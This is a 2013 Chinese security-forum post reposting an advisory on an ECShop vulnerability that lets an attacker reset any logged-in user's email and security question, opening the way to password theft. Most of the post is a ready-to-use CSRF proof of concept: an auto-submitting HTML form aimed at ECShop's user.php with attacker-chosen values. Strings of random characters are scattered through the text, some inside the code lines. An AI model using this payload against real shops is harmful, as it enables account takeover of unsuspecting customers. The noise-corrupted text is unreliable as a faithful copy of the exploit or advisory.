中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:! g6 @" f) X: f# B+ ]$ X. f
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现% W7 s) y5 `6 U' n

( v% d: B8 ^2 _+ j1 \) XDemo For:http://www.wooyun.org/bug.php?action=view&id=395
! G. i+ h  l3 j, `. |5 h/ y5 @1 A0 U4 y! g% ~) [
详细说明:& |" X$ [9 f% ?
利用csrf和xss可以突破官方所说的“障碍”1 m2 g' Q  D2 [
xss版本已经有人说明
+ Z9 c" B4 f2 \4 O2 u( V9 f' R这里给出csrf版本
  O* {# G  h0 z7 H3 A8 M: C$ V5 j, t& h4 z: v5 w, V0 `- D
漏洞证明:% g' S! t7 O: O* T
<html>4 X4 B, v% E8 S! G
<body># \. F: h$ R6 H
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">, B  j* h6 Z: |  F
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
. M) r8 D! `( |<INPUT TYPE="text" NAME="act" value="act_edit_profile">
9 ]# u8 W7 D* P3 n1 H8 I2 H<INPUT TYPE="text" NAME="sel_question" value="ecshop">3 Y4 I- w5 W- H$ }0 P' F( \
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">, ?  U% M3 c  ]& R) Q; N
</body>
7 w" v/ b; q7 V( U<script>. H! t+ n/ i7 _' [; k& f! q1 e! W
document.forms[0].submit();
4 a1 [. ^) R2 L& ~$ s" D- O/ v  v</script>
, ~, e% H8 H0 ^# e. R2 @* T2 C7 T</html>
7 Z! B" L0 ?8 y8 z. V: W, n构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
; R9 u) J( r0 |' j; ^' r  N, H; ^! a8 {/ e" y  {$ E  [





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2